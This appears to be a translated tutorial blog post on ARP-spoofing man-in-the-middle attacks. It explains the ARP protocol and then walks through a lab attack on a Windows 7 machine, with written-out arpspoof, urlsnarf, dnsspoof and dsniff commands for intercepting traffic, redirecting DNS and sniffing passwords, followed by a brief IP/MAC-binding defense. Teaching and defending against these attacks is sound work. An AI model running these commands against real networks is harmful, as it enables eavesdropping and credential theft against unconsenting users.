Man in the middle attack (mitm) is a kind of long-standing attack means. In short, it means to intercept your traffic, then tamper with or sniff the traffic, and even an old network "expert" may not find his way. Next, the author will introduce the attack principle and defense means to you one by one.
0x01. ARP protocol analysis
ARP is the address resolution protocol. When data packets are transmitted in Ethernet, they need two addresses, one is IP address, the other is MAC address. The IP address is only used for logical addressing. Ethernet cannot communicate through IP address, because IP address can be changed, and IP based communication is unreliable and insecure. Therefore, in Ethernet, physical communication is mainly based on MAC address, because MAC address of computer has been set at the time of production and will not be changed in general, and ARP protocol is used to help The host gets the MAC address of the target host!
ARP communication process:
1. First, each host will establish an ARP list in its own ARP buffer to represent the corresponding relationship between IP address and MAC address
2. When the source host needs to send data packets to the target host, it will first check whether its ARP buffer has the MAC address corresponding to the IP address, and if so, it will directly send the data packets to the MAC address; if not, the source host will send ARP broadcast packets in this network segment, and query the MAC address corresponding to the IP address of the target host (Note: only the LAN environment is discussed here)
3. The host receiving the ARP broadcast packet will check whether the destination IP address in the packet is the same as its own IP address, and discard the packet if it is different; if it is the same, the target host will cache the IP / Mac correspondence in the packet into its own ARP list, and overwrite the MAC originally belonging to the IP correspondence (Note: This is the key to man in the middle attack), and then give it to the source host The computer sends an ARP response packet to tell the other party that it is the MAC address it needs to find
4. After receiving the ARP response packet, the source host will add the IP address and MAC address of the destination host to its ARP list, and use this information to start data transmission.
0x02. ARP hijacking principle
As shown in the figure above, man in the middle attack is to hijack the communication between the normal client < - > server and turn it into a client < - > attacker < - > server, so that the traffic of both the client and the server passes through the attacker's computer. At this time, the attacker can listen to the traffic flowing through the machine and carry out tampering and sniffing. Here's how to make an attacker a middleman.
client<——>server
client<——>attacker<——>server
Mitm principle:
1. At the beginning, the author introduced the communication principle of ARP protocol. The reason for this is to let everyone have a deeper understanding of the protocol, and then better understand the essence of the middleman, so as to know how to defend
2. In fact, the computer is very stupid. It can't think as sensitively as human beings. For example, we send an ARP packet directly to the client and claim that the IP corresponding to my Mac is the gateway IP. Later, send your packet to me and let me forward it for you. Then the client will believe it if he doesn't want to, and ignore whether he sends the ARP broadcast packet
3. It is the same when deceiving the gateway, so the subsequent communication will become client < - > attacker < - > gateway
client<——>attacker<——>gateway
0x03. Mitm attack practice
Environmental preparation:
Kali Linux
IP of win 7 target = 192.168.1.106
Attack process:
1. Start the traffic forwarding function of Kali, and then start arpspoof to cheat the target and gateway in both directions, and become the middleman
echo 1 > /proc/sys/net/ipv4/ip_forward && arpspoof -t 192.168.1.106 -r 192.168.1.1
2. Start urlsnarf to monitor the URL visited by the target
urlsnarf -i eth0
3. DNS spoofing through dnsspoof (Note: the tool is not stable when I use it, sometimes I succeed and sometimes I fail, but it fails in most cases. It may be that my target machine has DNS records in its cache, so we try to choose sites that we haven't visited.)
echo "192.168.1.1 *.wmpic.me" > dnsspoof.host && dnsspoof -i eth0 -f dnsspoof.host
4. Sniff password through dsniff
Dsniff -cm
0x04. Defense measures
Let's talk about the use of middlemen here. You can Google other tools by yourself. Here's the defense method. ARP based man in the middle attack can be eliminated only by setting IP / Mac binding on the gateway. In fact, the principle is very simple, which is why I introduce ARP principle to you above.
0x05. conclusion
I wish you all a happy National Day!! If you have any questions, you can add groups to communicate with the author
If you want to contribute, you can contact the group leader in groups